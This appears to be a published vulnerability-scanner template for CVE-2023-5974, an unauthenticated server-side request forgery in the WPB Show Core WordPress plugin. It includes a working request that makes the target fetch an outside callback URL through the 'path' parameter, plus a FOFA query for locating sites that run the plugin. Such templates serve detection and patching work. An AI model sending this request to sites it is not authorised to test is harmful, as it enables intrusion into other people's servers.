The WPB Show Core WordPress plugin through version 2.2 is vulnerable to Server-Side Request Forgery (SSRF) via the 'path' parameter in the download-file.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
PoC代码[已公开]
id: CVE-2023-5974
info:
name: WordPress WPB Show Core <= 2.2 - Server-Side Request Forgery
author: ritikchaddha
severity: critical
description: |
The WPB Show Core WordPress plugin through version 2.2 is vulnerable to Server-Side Request Forgery (SSRF) via the 'path' parameter in the download-file.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
reference:
- https://wpscan.com/vulnerability/c0136057-f420-4fe7-a147-ecbec7e7a9b5
- https://nvd.nist.gov/vuln/detail/CVE-2023-5974
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5974
cwe-id: CWE-918
epss-score: 0.84237
epss-percentile: 0.99271
cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: wpb-show-core-project
product: wpb-show-core
fofa-query: body="wp-content/plugins/wpb-show-core/"
tags: cve,cve2023,wp,wordpress,wp-plugin,ssrf,wpb-show-core,oast
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "wpb-show-core"
internal: true
- raw:
- |
GET /wp-content/plugins/wpb-show-core/download-file.php?path=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 490a0046304402205351e4b7af03c3cf8e7520ad5d5c94e16bdc4169203914d18a029030c9d269530220161cf1b4e810711668cfff49720d10095889fbd01b342d2480ee150737c34b68:922c64590222798bb761d5b6d8e72950